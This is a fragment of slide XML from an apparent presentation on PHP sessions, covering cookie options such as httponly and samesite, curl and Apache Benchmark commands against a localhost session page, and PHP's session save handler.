            <a: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    'httponly' =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a: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    '</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>samesite</a:t>
            </a:r>
            <a:r>
              <a:t>' =&gt; 'Strict'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);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188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189" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12466898" y="3582509"/>
            <a:ext cx="10738392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/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A7A7A7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="A7A7A7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>samesite</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A7A7A7"/>
                </a:solidFill>
              </a:rPr>
              <a:t> option values</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="A7A7A7"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lax</a:t>
            </a:r>
            <a:r>
              <a:t>' enables only first-party cookies to be sent/accessed. First-party Cookies are created by a visited website a visitor entered directly. Using first-party cookies means it's your domain collecting data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strict</a:t>
            </a:r>
            <a:r>
              <a:t>' is a subset of 'lax' and won't fire if the incoming link is from an external site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>None</a:t>
            </a:r>
            <a:r>
              <a:t>' signals that the cookie data can be shared with third parties/external sites (for advertising, embedded content, etc)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190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193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194" name="Server side"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9267062" y="6137401"/>
            <a:ext cx="5849875" cy="1441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chemeClr val="accent3">
                    <a:satOff val="-7500"/>
                    <a:lumOff val="-10588"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Server side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quired skills / stuff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Required skills / stuff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="3575403"/>
            <a:ext cx="21971000" cy="8173206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b="1" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="A7A7A7"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>// Terminal ( Client side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A7A7A7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A7A7A7"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>// CURL Commands to access a URL.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 b="1"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:t> curl http://localhost/session/index.php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 b="1"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:t> curl -H "Cookie: PHPSESSID=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session-id</a:t>
            </a:r>
            <a:r>
              <a:t>;" http://localhost/session/index.php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A7A7A7"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>// Benchmarking (Apache Benchmark) Commands for a URL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 b="1"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ab </a:t>
            </a:r>
            <a:r>
              <a:t>-c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98658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 </a:t>
            </a:r>
            <a:r>
              <a:t>-n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98658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>http://localhost/session/index.php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 b="1"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ab </a:t>
            </a:r>
            <a:r>
              <a:t>-c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98658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 </a:t>
            </a:r>
            <a:r>
              <a:t>-n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98658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>-H "Cookie: PHPSESSID=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session-id</a:t>
            </a:r>
            <a:r>
              <a:t>;”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>http://localhost/session/index.php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b="1" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="A7A7A7"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>// PHP end ( Server side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A7A7A7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In order to understand session internals we will be using PHP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session_set_save_handler</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t> function.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198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199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